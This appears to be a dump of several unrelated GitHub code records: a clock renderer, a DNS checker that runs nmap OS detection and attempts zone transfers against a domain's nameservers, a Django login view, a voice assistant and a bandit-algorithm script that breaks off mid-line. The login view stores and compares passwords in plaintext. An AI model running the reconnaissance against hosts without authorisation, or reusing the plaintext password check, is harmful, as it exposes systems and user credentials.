ts.monthstrings_de[kwargs[\"timestamp\"].month-1], kwargs[\"timestamp\"].year).upper()\n datefont = getFont(\"arialbold\",100)\n dsz = datefont.getsize(s)\n di = Image.new(\"L\", dsz)\n fill(di)\n d 
= ImageDraw.Draw(di)\n d.text((0,0),s,font=datefont,fill=0x53)\n di = di.resize((w, int(w/10)))\n screen.paste(di, (x0, y0 - int(di.size[1]*1.3)))\n\n # barcode\n y1 = y0 + h + int(h*0.05)\n barcode = getImage(\"barcode\")\n screen.paste(barcode, (x0+w-barcode.size[0], y1))\n\n # price\n draw = ImageDraw.Draw(screen)\n pricefont = getFont(\"arialbold\", 20)\n draw.text((x0, y1), \"1.00 EURO 44/8\", font=pricefont, fill=0x00)\n draw.text((x0, y1 + int(h/10)), \"www.bild.de\", font=pricefont, fill=0x00)\n\n return screen\n\nclass _StyleSpanish(RendererEuroClock):\n def doRender(self, screen, **kwargs): \n \n # textcolor\n textcolor = ImageColor.getcolor(\"black\", screen.mode)\n \n # background\n bg = getImage(\"bg_elpais\")\n screen.paste(bg)\n\n # draw obj\n draw = ImageDraw.Draw(screen)\n \n # date line\n p = [347,257]\n dstring = ts.GetDateString(kwargs[\"timestamp\"], lang=\"es\", includeday=False).upper()\n dstring = dstring + \" | Numero 12345 | EDICION MADRID | \"\n daystr = ts.daystrings_es[kwargs[\"timestamp\"].weekday()].title()\n dfont1 = getFont(\"arialbold\", 16)\n dfont2 = getFont(\"arial\", 16)\n tsz = dfont1.getsize(daystr)\n draw.text(p, daystr, font=dfont1, fill=textcolor)\n p[0] = p[0] + tsz[0] + 5\n draw.text(p, dstring, font=dfont2, fill=textcolor)\n tsz = dfont2.getsize(dstring)\n p[0] = p[0] + tsz[0] + 5\n draw.text(p, \"Precio: 2,80 EUR\", font=dfont1, fill=textcolor)\n\n # headline\n y = 410\n dy = 110\n hfont = getFont(\"timesbold\", 100)\n htext = ts.GetTimeString(kwargs[\"timestamp\"], lang=\"es\")\n htext_split = ts.HalfAndHalf(htext)\n for l in htext_split:\n x = int((screen.size[0] - hfont.getsize(l)[0])/2)\n draw.text((x,y), l, font=hfont, fill=textcolor)\n y = y + dy\n \n return screen\n\n\n\n# automated luxury space communist style collection\n\nstyles = []\nl = locals().copy()\nfor name, obj in l.items():\n if name.startswith(\"_Style\"):\n styles.append(obj)\nlogger.debug(\"euro styles loaded: \" + str(styles))","repo_name":"grob6000/JJClock","sub_path":"jjrenderer/euro.py","file_name":"euro.py","file_ext":"py","file_size_in_byte":9850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"88"} +{"seq_id":"25913049539","text":"import platform\nimport subprocess\nimport dns.resolver\nimport dns.reversename\nimport dns.zone\nimport dns.query\nimport dns.message\nimport dns.dnssec\nimport socket\nimport nmap3\nimport simplejson as json\nfrom pygments import highlight, lexers, formatters\nimport dns.rdatatype\nimport dns.flags\n\nclass bcolor:\n RED = '\\033[91m'\n GREEN = '\\033[92m'\n YELLOW = '\\033[93m'\n WHITE = '\\033[97m'\n\nclass NmapScan:\n state = \"\"\n os = \"\"\n def __init__(self, ip):\n n = nmap3.Nmap()\n result = n.nmap_os_detection(ip)\n for data in result:\n self.os = data['cpe']\n\nclass DnsChecker:\n domain = \"\"\n ip = \"\"\n ns = []\n txt = []\n soa = \"\"\n mx = \"\"\n timeout = 5.0\n def banner(self):\n flag = \"\"\"\n =======================================================================================================\n * ******** ****** ** ** ** ** ****** ** '``' *\n * ** ** ** ** ** ** ** ** ** ** ** '- framet'?'' *\n * ** ** ** ** ** ** ** ** ** ** ** '' '' *\n * ** ** ** ** ** ** ** ** ********* ** *\n * ** ** ** *** ** ** ** ** ** ** *\n * ** ** ** ** ** ** ***** ** ** ** ** *\n * ***** ****** ** ** *** ** ** *********** *\n =======================================================================================================\n \"\"\"\n print(bcolor.GREEN + flag)\n\n def __init__(self, 
domain):\n        self.domain = domain\n        self.get_ip()\n        self.get_ns()\n        self.get_txt()\n        self.get_soa()\n        self.get_mx()\n        self.banner()\n\n    def get_ip(self):\n        try:\n            result = dns.resolver.resolve(self.domain, 'A')\n            for data in result:\n                self.ip = data.to_text()\n        except Exception as e:\n            print( \"No se pudo resolver la ip del dominio : \" + self.domain)\n\n    def get_ns(self):\n        try:\n            result = dns.resolver.resolve(self.domain, 'NS')\n            for data in result:\n                self.ns.append(data.to_text())\n            self.ns.sort()\n        except Exception as e:\n            print( \"No se pudo resolver los names server del dominio : \" + self.domain)\n\n    def get_txt(self):\n        try:\n            result = dns.resolver.resolve(self.domain, 'TXT')\n            for data in result:\n                self.txt.append(data.to_text())\n        except Exception as e:\n            print (\"No se puede resolver TXT record del domain : \" + self.domain)\n\n    def get_soa(self):\n        try:\n            result = dns.resolver.resolve(self.domain, 'SOA')\n            for data in result:\n                self.soa = data.to_text()\n        except Exception as e:\n            print( \"No se pudo resolver SOA (Start of authority) del dominio : \" + self.domain)\n\n    def get_mx(self):\n        try:\n            result = dns.resolver.resolve(self.domain, 'MX')\n            for data in result:\n                self.mx = data.to_text()\n        except Exception as e:\n            print( \"No se pudo resolver MX (Mail Server for accepting email messages) del dominio : \" + self.domain)\n\n    def get_general_info(self):\n        try:\n            print(bcolor.RED + \"********** Información General *******************\" + bcolor.GREEN)\n            print(bcolor.YELLOW + \"Dominio : \" + bcolor.WHITE + self.domain)\n            print(bcolor.YELLOW + \"IP : \" + bcolor.WHITE + self.ip)\n            for index in self.ns:\n                print(bcolor.YELLOW + \"NameServer: \" + bcolor.WHITE + index)\n            for index in self.txt:\n                print(bcolor.YELLOW + \"TXT record: \" + bcolor.WHITE + index)\n            print(bcolor.YELLOW + \"SOA (Start of authority) : \" + bcolor.WHITE + self.soa)\n            print(bcolor.YELLOW + \"MX (Mail Server): \" + bcolor.WHITE + self.mx)\n\n        except Exception as e:\n            print(e)\n\n    def query_response_time(self):\n        answer = \"\"\n        try:\n            query = dns.message.make_query(self.domain, dns.rdatatype.DS, dns.rdataclass.IN)\n            query.flags += dns.flags.CD\n            query.use_edns(edns=True, payload=4096)\n            print(bcolor.YELLOW + \"DNSSEC : \" + str(query.want_dnssec(True)))\n\n            print(bcolor.RED + \"************Validación de disponibilidad de server DNS **************\" + bcolor.GREEN)\n            i=1\n            for data in self.ns:\n                print(bcolor.RED + \"************ DNS Server # {0} **************\".format(i) + bcolor.GREEN)\n                answer = dns.query.udp(query, socket.gethostbyname(data), self.timeout)\n                print(bcolor.YELLOW + \"Server: \" + bcolor.WHITE + format(data) + bcolor.YELLOW + \" IP : \" + bcolor.WHITE + socket.gethostbyname(data) + bcolor.YELLOW + \" Estado : \" + bcolor.WHITE + \"Operativo\" )\n                print(bcolor.YELLOW + \"Timeout : \" + bcolor.WHITE)\n                self.ping(socket.gethostbyname(data))\n                print(bcolor.YELLOW + \"Tamaño de carga util EDNS (payload) : \" + bcolor.WHITE + str(answer.payload))\n                print(bcolor.YELLOW + \"Flags del mensaje: \" + bcolor.WHITE + str(answer.flags))\n                scan = NmapScan(str(socket.gethostbyname(data)))\n                print(\"Sistema Operativo : \" + scan.os)\n                self.transfer_zone(socket.gethostbyname(data))\n                i += 1\n        except dns.exception.Timeout:\n            print(bcolor.RED + \" Advertencia!! 
-> Tiempo de espera superado al tratar de llegar al servidor DNS en {0} segundos \".format(self.timeout))\n        except Exception as e:\n            raise\n\n    def print_data(self):\n        self.get_general_info()\n        self.query_response_time()\n\n    def transfer_zone(self, ip):\n        try:\n            print (bcolor.RED + \"######## Zones Transference #######################\" + bcolor.GREEN)\n            #z = dns.zone.from_xfr(dns.query.xfr(\"81.4.108.41\",\"zonetransfer.me\"))\n            zone = dns.zone.from_xfr(dns.query.xfr(ip,self.domain))\n            names = zone.nodes.keys()\n            print (\"Zona de Transferencia Activada....... A continuación la lista encontrada\")\n            for n in names:\n                print(zone[n].to_text(n))\n        except dns.xfr.TransferError:\n            print (\"Transferencia de Zona para el dominio {0} no esta autorizada \".format(self.domain))\n\n    def ping(self, ip):\n        param = '-n' if platform.system().lower()=='windows' else '-c'\n        command = ['ping', param, '1', ip]\n        return subprocess.call(command) == 0\n\nif __name__ == '__main__':\n    #domain = \"prueba.com\"\n    domain = input (\"Ingrese el dominio a evaluar: \")\n    try:\n        obj = DnsChecker(domain)\n        obj.print_data()\n    except socket.gaierror:\n        print (bcolor.RED + \" Advertencia: Dominio no existe !!\")\n","repo_name":"JoynalFrametOlimpo/dns_checker","sub_path":"dns_checker.py","file_name":"dns_checker.py","file_ext":"py","file_size_in_byte":7164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"88"} +{"seq_id":"19432667374","text":"from dataclasses import field\nimport json\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.response import Response\nfrom rest_framework.permissions import AllowAny\n\nfrom .models import User, Survey, User_kind_code\n\nfrom django.db import connection\n\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.hashers import check_password\nfrom django.shortcuts import get_object_or_404\nfrom django.http.response import JsonResponse\nfrom django.core import serializers\n\n\nfrom apps.user.serializer import UserSerializer\n\n# Create your views here.\n# Sign up\n@api_view(['POST'])\n@permission_classes([AllowAny])\ndef signup(request):\n    user = UserSerializer(data=request.data)\n    reply_list= request.data['reply_list']\n\n    if user.is_valid():\n\n        user_k = cal_reply(reply_list).kind_code\n        user.save()\n        \n        user_id = user['user_id'].value\n        User.objects.filter(user_id = user_id).update(user_kind = user_k)\n        kind_n = User_kind_code.objects.get(kind_code = user_k)\n        kind = kind_n.kind_name\n\n        id = User.objects.get(user_id = user_id) # user_no\n        Survey.objects.create(user_no = id, reply_list = reply_list)\n        return JsonResponse({'result' : \"success\", 'user_kind': [user_k, kind]})\n    return JsonResponse({'result' : \"fail\"})\n    #return Response(user.errors, status=status.HTTP_400_BAD_REQUEST)\n\ndef cal_reply(reply_list):\n    ey=0\n    en=0\n    oy=0\n    on=0\n    for index, val in enumerate(reply_list):\n        print(index, val)\n        # even-numbered question\n        if((index+1)%2==0):\n            if(val == 'Y'): \n                ey += 1\n            else: \n                en +=1\n        # odd-numbered question\n        else:\n            if(val == 'Y'): \n                oy += 1\n            else: \n                on +=1\n\n    \n    # if(oy>on):\n    #     if(ey>en):\n    #         user_k = User_kind_code.objects.get(kind_code = 'K1')\n    #         # us.update(user_kind= user_k)\n    #     else: \n    #         print(\"here\")\n    #         user_k = User_kind_code.objects.get(kind_code = 'K2')\n    #         # us.update(user_kind =user_k)\n    # else:\n    #     if(ey>en):\n    #         user_k = User_kind_code.objects.get(kind_code = 'K3')\n    #         # us.update(user_kind=user_k)\n    #     else:\n    #         # us.update(user_kind=user_k)\n    \n    if(oy>on):\n        if(ey>en):\n            kind_code = 'K1'\n        else: \n            kind_code = 'K2'\n    else:\n        if(ey>en):\n            kind_code = 'K3'\n        else:\n            kind_code = 'K4'\n    \n    user_k = User_kind_code.objects.get(kind_code = kind_code)\n\n    return user_k\n\n\n# Check for a duplicate ID\n@api_view(['GET'])\n@permission_classes([AllowAny])\ndef checkid(request, id):\n    try:\n        id = User.objects.get(user_id = id) \n    except :\n        id = None \n    if id is None :\n        duplicate =\"success\"\n    else : \n        duplicate = \"fail\"\n    context= {'result' : duplicate}\n    return JsonResponse(context)\n\n\n# Log in\n@api_view(['POST'])\n@permission_classes([AllowAny])\ndef signin(request):\n    reqData=request.data\n    user_id=reqData['user_id']\n    password= reqData['password']\n    print(\"id : \",user_id)\n    row = serializers.serialize(\"json\", User.objects.filter(user_id=user_id), fields = {\"nickname\", \"password\"})\n    print(row)\n    size= len(json.loads(row))\n    if(size == 0):\n        login =\"fail\"\n        nick =None\n        user_no=None\n    else : \n        u_no = json.loads(row)[0]['pk']\n        password_n = json.loads(row)[0]['fields']['password']\n        nickname_n = json.loads(row)[0]['fields']['nickname']\n        if(password != password_n):\n            login = \"fail\"\n            nick = None\n            user_no=None\n        else:\n            login = \"success\"\n            nick =nickname_n\n            user_no=u_no\n    context= {'result' : login ,\n              'nickname' : nick,\n              'user_no' : user_no }\n    return JsonResponse(context)\n\n    \n\n    \n","repo_name":"hh2728/WouldU","sub_path":"backend/apps/user/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"88"} +{"seq_id":"39398659755","text":"import speech_recognition as sr # recognise speech\r\nimport playsound # to play an audio file\r\nfrom gtts import gTTS # google text to speech\r\nimport random\r\nimport time\r\nfrom time import ctime # get time details\r\nimport webbrowser # open browser\r\nimport yfinance as yf # to fetch financial data\r\nimport ssl\r\nimport certifi\r\nimport os # to remove created audio files\r\nimport subprocess\r\nfrom os import sys\r\nimport wikipedia\r\nfrom pynput.mouse import Button, Controller\r\nfrom pynput import keyboard\r\nimport numpy\r\n\r\nbrowser = \"chrome.exe\"\r\n\r\n\r\n# declaration of mouse and keyboard\r\nmouse = Controller()\r\nkey = keyboard.Controller()\r\n\r\n\r\nclass person:\r\n    name = ''\r\n\r\n    def setName(self, name):\r\n        self.name = name\r\n\r\ndef there_exists(terms):\r\n    for term in terms:\r\n        if term in voice_data:\r\n            return True\r\n\r\n\r\n\r\nr = sr.Recognizer() # initialise a recogniser\r\n# listen for audio and convert it to text:\r\n\r\n\r\ndef record_audio(ask=False):\r\n    with sr.Microphone() as source: # microphone as source\r\n        if ask:\r\n            speak(ask)\r\n        audio = r.listen(source) # listen for the audio via source\r\n        voice_data = ''\r\n        try:\r\n            voice_data = r.recognize_google(audio) # convert audio to text\r\n        except sr.UnknownValueError: # error: recognizer does not understand\r\n            speak('what should i do')\r\n        except sr.RequestError:\r\n            # error: recognizer is not connected\r\n            speak('Sorry, the service is down')\r\n        print(f\">> {voice_data.lower()}\") # print what user said\r\n        return voice_data.lower()\r\n\r\n# get string and make an audio file to be played\r\n\r\ndef speak(audio_string):\r\n    tts = gTTS(text=audio_string, lang='en') # text to speech(voice)\r\n    r = random.randint(1, 20000000)\r\n    audio_file = 'audio' + str(r) + '.mp3'\r\n    tts.save(audio_file) # save as mp3\r\n    playsound.playsound(audio_file) # play the audio file\r\n    
print(f\"Alpha: {audio_string}\") # print what app said\r\n os.remove(audio_file) # remove audio file\r\n\r\n\r\n\r\ndef respond(voice_data):\r\n\r\n#manners\r\n if there_exists([\"wait for\",\"weight for\"]):\r\n search_term = voice_data.split(\"for\")[-1]\r\n speak(f'Ok sir i will not interuppting you for {search_term} minuits')\r\n time.sleep(int(search_term)*60)\r\n speak(f'Sir, are u free now?')\r\n \r\n if there_exists([\"no\"]) and ([\"more\"]):\r\n search_term = voice_data.split(\"more\")[-1]\r\n speak(f'Ok sir i will not interuppting you for {search_term} minuits')\r\n time.sleep(int(search_term)*60)\r\n speak(f'Sir, are u free now?')\r\n \r\n if there_exists([\"yes\"]) and ([\"am\"]) and ([\"i\"]) and ([\"free\"]):\r\n speak(f'ok sir, always at your service')\r\n\r\n\r\n # introoooooooooooooo.................................................????????>>>>>>>>>>>>>>>>>>>>>\r\n # 0: Introduction\r\n if there_exists([\"alpha\"]):\r\n speak(\"Yes Sir, i'm your personal P.C Assistent!. Alpha....... . Checking for System Being online...... . All set!.... Good to go sir!....\")\r\n\r\n # 0: vertion\r\n if there_exists([\"vertion\", \"version\"]):\r\n speak(\"currently i'm Alpha 2.0. Later vertions are Alpha! Alpha 1.0! Alpha 1.1.0! Alpha 1.2!\")\r\n\r\n # 0: vertion\r\n if there_exists([\"introduction\", \"intro\"]):\r\n speak(\"currently i'm Alpha 2.0. Later vertions are Alpha! work as a chat bot! Alpha 1.0! modified youtube search. Alpha 1.1.0! modified google search. Alpha 1.2!modified tiem and os capability\")\r\n\r\n # 1: greeting\r\n if there_exists(['hey', 'hay', 'hi', 'hello']):\r\n greetings = [f\"hey, how can I help you {person_obj.name}\", f\"hey, what's up? {person_obj.name}\",\r\n f\"I'm listening {person_obj.name}\", f\"how can I help you? {person_obj.name}\", f\"hello {person_obj.name}\"]\r\n greet = greetings[random.randint(0, len(greetings)-1)]\r\n speak(greet)\r\n\r\n # 2: name\r\n if there_exists([\"what is your name\", \"what's your name\", \"tell me your name\", \"Who are you\"]):\r\n if person_obj.name:\r\n speak(\"my name is Alpha. 
Version 2.OO !\")\r\n else:\r\n speak(\"my name is Alpha.\")\r\n\r\n if there_exists([\"my name is\"]):\r\n person_name = voice_data.split(\"is\")[-1].strip()\r\n speak(f\"okay, i will remember that {person_name}\")\r\n person_obj.setName(person_name) # remember name in person object\r\n\r\n if there_exists([\"whta is my name\"]):\r\n person_name = voice_data.split(\"is\")[-1].strip()\r\n speak(f\"Sir, your name is {person_name}\")\r\n person_obj.setName(person_name)\r\n\r\n # 3: greeting\r\n if there_exists([\"how are you\", \"how are you doing\"]):\r\n speak(f\"I'm very well, thanks for asking {person_obj.name}\")\r\n\r\n # introoooooooooooooo.................................................????????>>>>>>>>>>>>>>>>>>>>>\r\n\r\n # 4: time\r\n if there_exists([\"what's the time\", \"tell me the time\", \"what time is it\"]):\r\n time1 = ctime().split(\" \")[3].split(\":\")[0:2]\r\n if time1[0] == \"00\":\r\n hours = '12'\r\n else:\r\n hours = time1[0]\r\n minutes = time1[1]\r\n time1 = f'{hours} {minutes}'\r\n speak(time1)\r\n\r\n # 5: search google\r\n if there_exists([\"search for\"]) and 'youtube' not in voice_data:\r\n search_term = voice_data.split(\"for\")[-1]\r\n url = f\"https://google.com/search?q={search_term}\"\r\n webbrowser.get().open_new_tab(url)\r\n speak(f'Here is what I found for {search_term} on google')\r\n\r\n # 6.1: search youtube\r\n if there_exists([\"play my song\"]):\r\n webbrowser.get().open_new_tab(\r\n \"https://www.youtube.com/watch?v=mRvKlUcD8vs&list=RDmRvKlUcD8vs&start_radio=1\")\r\n speak(f'Playing songs from youtube!')\r\n\r\n # 6.2: Open Facebook\r\n if there_exists([\"open facebook\"]):\r\n webbrowser.get().open_new_tab(\"https://www.facebook.com/\")\r\n speak(f'Opened FaceBook for you Sir')\r\n\r\n # 6.2: Open WhatsAPP\r\n if there_exists([\"open whatsapp\"]):\r\n webbrowser.get().open_new_tab(\"https://web.whatsapp.com/\")\r\n speak(f'Opened WhatsApp for you Sir')\r\n\r\n # 6.3: Open Gmail\r\n if there_exists([\"open my gmail\"]):\r\n webbrowser.get().open_new_tab(\"https://mail.google.com/mail/u/0/#inbox\")\r\n speak(f'Opened Your Gmail for you Sir')\r\n\r\n # 6.3: Open Dad Gmail\r\n if there_exists([\"open dad gmail\"]):\r\n webbrowser.get().open_new_tab(\"https://mail.google.com/mail/u/1/#inbox\")\r\n speak(f'Opened Dads Gmail for you Sir')\r\n\r\n # 6.3: Open Javatpoint\r\n if there_exists([\"open java t point\"]):\r\n webbrowser.get().open_new_tab(\"https://www.javatpoint.com/\")\r\n speak(f'Opened javatpoint for you Sir')\r\n\r\n # 6.3: Open Dad Gmail\r\n if there_exists([\"open tutorialspoint\"]):\r\n webbrowser.get().open_new_tab(\"https://www.tutorialspoint.com/index.htm\")\r\n speak(f'Opened tutorialspoint for you Sir')\r\n\r\n # 6.3: Open greeksforgreeks Gmail\r\n if there_exists([\"open greeks for greeks\", \"open greeksforgreeks\", \"open greekforgreek\", \"greekforgreeks\"]):\r\n webbrowser.get().open_new_tab(\"https://www.geeksforgeeks.org/\")\r\n speak(f'Opened geeksforgeeks for you Sir')\r\n\r\n # 7: search wikipedia\r\n if there_exists([\"wikipedia for\"]):\r\n search_term = voice_data.split(\"for\")[-1]\r\n url = f\"https://en.wikipedia.org/wiki/{search_term}\"\r\n webbrowser.get().open_new_tab(url)\r\n speak(wikipedia.summary(search_term, sentences=2))\r\n\r\n # 8 Controlling Youtube........................................................................?>>>>>>>>>>>>>>>>>>>>>>>>>\r\n\r\n # 6: search youtube\r\n if there_exists([\"open youtube for\"]):\r\n search_term = voice_data.split(\"for\")[-1]\r\n url = 
f\"https://www.youtube.com/results?search_query={search_term}\"\r\n webbrowser.get().open_new_tab(url)\r\n speak(f'Here is what I found for {search_term} on youtube')\r\n\r\n # 8.1 Youtube next video\r\n if there_exists([\"next video\"]):\r\n mouse.position = (202, 883)\r\n mouse.click(Button.left, 1)\r\n speak(f'Skip to Next Video, sir ')\r\n\r\n # 8.2 Youtube previous video\r\n if there_exists([\"previous video\"]):\r\n mouse.position = (132, 883)\r\n time.sleep(1)\r\n mouse.click(Button.left, 1)\r\n time.sleep(1)\r\n mouse.click(Button.left, 1)\r\n speak(f'Skip to Previous Video, sir ')\r\n\r\n # 8.2 Youtube previous video\r\n if there_exists([\"skip add\", \"skip adds\", \"keep ad\"]):\r\n mouse.position = (1315, 808)\r\n mouse.click(Button.left, 1)\r\n speak(f'Add skipped, sir')\r\n\r\n # 8.3 Youtube pouse\r\n if there_exists([\"pose video\", \"pause video\"]):\r\n mouse.position = (164, 883)\r\n mouse.click(Button.left, 1)\r\n speak(f'Pouse Video, sir ')\r\n\r\n # 8.4 Youtube play video\r\n if there_exists([\"play video\"]):\r\n mouse.position = (164, 883)\r\n mouse.click(Button.left, 1)\r\n speak(f'Playing Video, sir ')\r\n\r\n # 8.5 Youtube mute\r\n if there_exists([\"mute video\"]):\r\n mouse.position = (243, 885)\r\n mouse.click(Button.left, 1)\r\n speak(f'Mute Video sound, sir ')\r\n\r\n # 8.6 Youtube unmute\r\n if there_exists([\"sound on\"]):\r\n mouse.position = (243, 885)\r\n mouse.click(Button.left, 1)\r\n speak(f'un Mute Video sound, sir ')\r\n\r\n # 8.7 Fullscreen\r\n if there_exists([\"full screen\"]):\r\n mouse.position = (964, 586)\r\n mouse.click(Button.left, 2)\r\n speak(f'Move to Full Screen Display')\r\n\r\n # 8.7 Normallscreen\r\n if there_exists([\"normal screen\"]):\r\n mouse.position = (964, 586)\r\n mouse.click(Button.left, 2)\r\n speak(f'Move to Normal Screen Display')\r\n\r\n # 8.8 Open youtube Menu\r\n if there_exists([\"youtube menu\"]):\r\n mouse.position = (28, 125)\r\n mouse.click(Button.left, 1)\r\n speak(f'Youtube menu open for you sir')\r\n\r\n # 8.9 Open youtube Trending\r\n if there_exists([\"youtube trending\"]):\r\n mouse.position = (77, 227)\r\n mouse.click(Button.left, 1)\r\n speak(f'Youtube Trending section open for you sir')\r\n\r\n # 8.9 Open youtube Home\r\n if there_exists([\"youtube home\"]):\r\n mouse.position = (71, 201)\r\n mouse.click(Button.left, 1)\r\n speak(f'Youtube Home section open for you sir')\r\n\r\n # 8.9 Open youtube History\r\n if there_exists([\"youtube history\"]):\r\n mouse.position = (91, 377)\r\n mouse.click(Button.left, 1)\r\n speak(f'Youtube History section open for you sir')\r\n\r\n # 8.10 select something from search lists\r\n if there_exists([\"show 1st one\",\"show first one\"]):\r\n time.sleep(1)\r\n mouse.position = (565, 291)\r\n mouse.click(Button.left, 1)\r\n speak(f'Showing 1st result')\r\n \r\n if there_exists([\"show 2nd one\",\"show second one\"]):\r\n time.sleep(1)\r\n mouse.position = (522, 437)\r\n mouse.click(Button.left, 1)\r\n speak(f'Showing 2nd result')\r\n \r\n if there_exists([\"show 3rd one\",\"show third one\"]):\r\n time.sleep(1)\r\n mouse.position = (567, 574)\r\n mouse.click(Button.left, 1)\r\n speak(f'Showing 3rd result')\r\n\r\n if there_exists([\"show forth one\",\"show fourth one\"]):\r\n time.sleep(1)\r\n mouse.position = (586, 769)\r\n mouse.click(Button.left, 1)\r\n speak(f'Showing 4th result')\r\n\r\n if there_exists([\"show fifth one\",\"show fifth one\"]):\r\n time.sleep(1)\r\n mouse.position = (541, 923)\r\n mouse.click(Button.left, 1)\r\n speak(f'Showing 5th result')\r\n\r\n 
if there_exists([\"youtube search bar\",\"youtube touch bar\"]):\r\n mouse.position = (638, 130)\r\n time.sleep(1)\r\n mouse.click(Button.left, 1)\r\n\r\n\r\n # 8 Controlling Youtube........................................................................?>>>>>>>>>>>>>>>>>>>>>>>>>\r\n\r\n\r\n # 9 VPN on off...............................................................................>>>>>>>>>>>>>>>>>>>>>\r\n # on vpn\r\n if there_exists([\"on vpn\"]):\r\n mouse.position = (344, 820)\r\n mouse.click(Button.left, 2)\r\n mouse.position = (1166, 627)\r\n time.sleep(2)\r\n mouse.click(Button.left, 1)\r\n time.sleep(5)\r\n mouse.position = (1456, 422)\r\n mouse.click(Button.left, 1)\r\n speak(f'turned on Hotspot Shield VPN for you sir')\r\n\r\n # off vpn\r\n if there_exists([\"off vpn\"]):\r\n mouse.position = (344, 820)\r\n mouse.click(Button.left, 2)\r\n time.sleep(1)\r\n mouse.position = (1172, 908)\r\n mouse.click(Button.left, 1)\r\n time.sleep(3)\r\n mouse.position = (1456, 422)\r\n mouse.click(Button.left, 1)\r\n speak(f'turned off Hotspot Shield VPN for you sir')\r\n\r\n # 9 VPN on off...............................................................................>>>>>>>>>>>>>>>>>>>>>\r\n\r\n # 10 Switching tabs...............................................................>>>>>>>>>>>>>>>>>>>>>\r\n if there_exists([\"page 1\", \"page one\"]):\r\n mouse.position = (166, 5)\r\n mouse.click(Button.left, 1)\r\n mouse.click(Button.left, 1)\r\n speak(f'switch to tab 1')\r\n\r\n if there_exists([\"page 2\", \"page to\"]):\r\n mouse.position = (388, 5)\r\n mouse.click(Button.left, 1)\r\n mouse.click(Button.left, 1)\r\n speak(f'switch to tab 2')\r\n\r\n if there_exists([\"page 3\", \"page three\"]):\r\n mouse.position = (606, 5)\r\n mouse.click(Button.left, 1)\r\n mouse.click(Button.left, 1)\r\n speak(f'switch to tab 3')\r\n\r\n if there_exists([\"page 4\", \"page four\"]):\r\n mouse.position = (847, 5)\r\n mouse.click(Button.left, 1)\r\n mouse.click(Button.left, 1)\r\n speak(f'switch to tab 4')\r\n\r\n if there_exists([\"page 5\", \"page five\"]):\r\n mouse.position = (1075, 5)\r\n mouse.click(Button.left, 1)\r\n mouse.click(Button.left, 1)\r\n speak(f'switch to tab 5')\r\n\r\n if there_exists([\"page 6\", \"page six\", \"page pic\"]):\r\n mouse.position = (1317, 5)\r\n mouse.click(Button.left, 1)\r\n mouse.click(Button.left, 1)\r\n speak(f'switch to tab 6')\r\n\r\n if there_exists([\"page 7\", \"page seven\", \"page saven\", \"page sevan\", ]):\r\n mouse.position = (1511, 5)\r\n mouse.click(Button.left, 1)\r\n mouse.click(Button.left, 1)\r\n speak(f'switch to tab 7')\r\n\r\n # 10 Switching tabs...............................................................>>>>>>>>>>>>>>>>>>>>>\r\n\r\n # 11 Minimize\r\n if there_exists([\"minimize\", \"minimise\"]):\r\n mouse.position = (1800, 14)\r\n mouse.click(Button.left, 1)\r\n mouse.click(Button.left, 1)\r\n speak(f'minimized displaying window')\r\n\r\n # 12 Scorling\r\n if there_exists([\"scroll down\",\"roll down\",\"troll down\"]) and \"present page\" not in voice_data:\r\n mouse.position = (1915, 1030)\r\n time.sleep(1)\r\n mouse.click(Button.left, 4)\r\n\r\n if there_exists([\"scroll down present page\",\"roll down preasent page\",\"troll down preasent page\"]):\r\n mouse.position = (1915, 1030)\r\n time.sleep(1)\r\n mouse.click(Button.left, 20)\r\n \r\n if there_exists([\"scroll up\",\"troll up\",\"roll up\"]) and \"present page\" not in voice_data:\r\n mouse.position = (1908, 113)\r\n time.sleep(1)\r\n mouse.click(Button.left, 4)\r\n \r\n if 
there_exists([\"scroll up present page\",\"troll up preasent page\",\"roll up preasent page\"]):\r\n mouse.position = (1908, 113)\r\n time.sleep(1)\r\n mouse.click(Button.left, 20)\r\n \r\n\r\n # 13 Typping\r\n if there_exists([\"type\"]):\r\n search_term = voice_data.split(\"type\")[-1]\r\n #keyboard.Controller.write(search_term)\r\n while there_exists([\"ok\"]):\r\n mouse.position = (1221, 128)\r\n time.sleep(1)\r\n mouse.click(Button.left, 1)\r\n break\r\n \r\n\r\n\r\n\r\n if there_exists([\"exit\", \"quit\", \"shutdown\"]):\r\n speak(\"going offline........ \")\r\n exit()\r\n\r\n\r\ntime.sleep(3)\r\n\r\nperson_obj = person()\r\n\r\n\r\nspeak(\"Hello Tanmoy. Alpha....... . Checking for System Being online...... . All set!.... Good to go sir!....\")\r\nwhile(1):\r\n voice_data = record_audio() # get the voice input\r\n respond(voice_data) # respond\r\n","repo_name":"AlphaTanmoy/JARVIS","sub_path":"alpha2.0.py","file_name":"alpha2.0.py","file_ext":"py","file_size_in_byte":16271,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"88"} +{"seq_id":"9305115826","text":"import math\nimport random\nimport time\nfrom math import log, sqrt\n\n\nclass StationaryEnvironmentModel:\n def __init__(self, k=10):\n self.qstar = [random.gauss(0, 1) for _ in range(k)]\n\n def reward(self, action_idx):\n return random.gauss(self.qstar[action_idx], 1)\n\n\nclass NonStationaryEnvironmentModel:\n def __init__(self, k=10):\n random_init = random.gauss(0, 1)\n self.qstar = [random_init] * k\n\n def reward(self, action_idx):\n\n # return reward with current qstars, mean qstar[action_idx] and variance 1\n return_reward = random.gauss(self.qstar[action_idx], 1)\n\n # update each qstar with a random walk, mean 0 sd 0.01\n self.qstar = [v + random.gauss(0, 0.01) for v in self.qstar]\n\n return return_reward\n\n def return_qstars(self):\n \"\"\"\n Return qstars at current timestep (for debugging purposes)\n \"\"\"\n return self.qstar\n\n\nclass EpsilonGreedy:\n def __init__(self, epsilon=0.1, k=10, init_value=0):\n self.t0 = True\n self.epsilon = epsilon\n self.k = k\n self.qn = [init_value] * k\n self.num_sel = [0] * k\n self.rewards_total = [0] * k\n\n def get_action(self):\n r = random.random()\n if self.t0 or r <= self.epsilon:\n action = random.randint(0, self.k - 1) # return random action\n self.t0 = False\n else:\n maxval = max(self.qn)\n possible_actions = [idx for idx, val in enumerate(self.qn) if val == maxval]\n action = random.sample(possible_actions, k=1)[0]\n\n return action\n\n def register_reward(self, action_idx, reward):\n self.rewards_total[action_idx] += 